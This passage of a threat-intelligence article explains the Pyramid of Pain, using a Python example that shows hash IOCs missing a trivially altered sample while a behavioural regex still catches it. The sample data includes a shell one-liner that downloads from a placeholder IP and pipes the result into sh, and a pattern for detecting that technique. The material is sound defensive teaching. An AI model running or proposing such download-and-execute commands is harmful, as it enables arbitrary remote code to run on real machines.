Threat intelligence (TI) has matured to the point where it can serve as a decision-making tool. TI is evidence-based knowledge, including context such as mechanisms, Indicators of Compromise (IOCs), Indicators of Attribution (IOAs), implications and actionable advice, about an existing or emerging hazard to assets. It allows technical staff to make better-informed decisions and to act on them accordingly.
Historically, intelligence tactics, techniques and procedures (TTPs), as well as the various kinds of intelligence operations, existed long before cyberspace was conceived. Intelligence is often seen as "offensive" in nature when viewed through the lens of espionage. The ultimate purpose of TI, however, is to enable the CISO or the CIO to make decisions based on evidence, and to enable the SOC to defend against an attack before it materializes.
There is a correlation between the type of indicator, its potential usefulness to the defender and the difficulty of obtaining the underlying data; this is usually pictured as the Pyramid of Pain. The base of the pyramid consists of unique file hashes (MD5, SHA1, etc.). These are easy to find and to share, but they are the least effective in the long run, because any change to the file, however trivial, produces a new hash. At the top of the pyramid sit TTPs, which are harder to discover and to learn, but far more effective from a defensive perspective, since an adversary has to change how they operate in order to evade a detection built on them.
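The following is an added illustration of the point above, not code from the original article. It builds a hash-based IOC from one constructed sample, then shows that a trivially modified variant of the same sample (one byte added to a command-line flag) no longer matches the hash, while a rule written against the behaviour (a download piped straight into a shell, a TTP-level pattern) still matches both variants and ignores a benign download. The sample payloads, the IP address and the regex are all constructed for the example.

```python
import hashlib
import re

# Constructed sample "payload" (just a shell one-liner, not real malware).
# 198.51.100.7 is a documentation-range address used here as a placeholder.
SAMPLE_V1 = b"#!/bin/sh\ncurl -s http://198.51.100.7/s | sh\n"

# Trivial variant: the attacker adds one character to a flag. The behaviour
# is identical, but the file hash is completely different.
SAMPLE_V2 = SAMPLE_V1.replace(b"curl -s ", b"curl -sS ")

# Benign control: a download that is saved to disk, not piped into a shell.
BENIGN = b"#!/bin/sh\ncurl -s https://example.org/file.tar.gz -o f.tar.gz\n"


def sha256_hex(data: bytes) -> str:
    """Hash value: the bottom level of the pyramid."""
    return hashlib.sha256(data).hexdigest()


# Hash IOC list built from the only sample the intel feed has seen so far.
HASH_IOCS = {sha256_hex(SAMPLE_V1)}


def hash_match(data: bytes) -> bool:
    """Hash-based detection: exact match against a shared IOC list."""
    return sha256_hex(data) in HASH_IOCS


# TTP-style rule (constructed for this example): a curl/wget download whose
# output is piped directly into sh or bash. It keys on how the adversary
# operates rather than on the bytes of one specific file.
TTP_RULE = re.compile(rb"(curl|wget)\b[^\n|]*\|\s*(sh|bash)\b")


def ttp_match(data: bytes) -> bool:
    """Behaviour-based detection: matches the technique, not the artifact."""
    return TTP_RULE.search(data) is not None


def evaluate(samples: dict[str, bytes]) -> dict[str, tuple[bool, bool]]:
    """Return {name: (hash_hit, ttp_hit)} for each sample."""
    return {name: (hash_match(d), ttp_match(d)) for name, d in samples.items()}


if __name__ == "__main__":
    results = evaluate({"v1": SAMPLE_V1, "v2": SAMPLE_V2, "benign": BENIGN})
    for name, (h, t) in results.items():
        print(f"{name:7s} hash_ioc={h!s:5s} ttp_rule={t}")
```

Running it shows the asymmetry the pyramid describes: the hash catches only the exact file it was derived from, the variant slips past it after a one-byte edit, and the behavioural rule catches both while leaving the benign download alone. The price is that the TTP rule took an analyst's understanding of the technique to write, whereas the hash was free.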
To read the original article: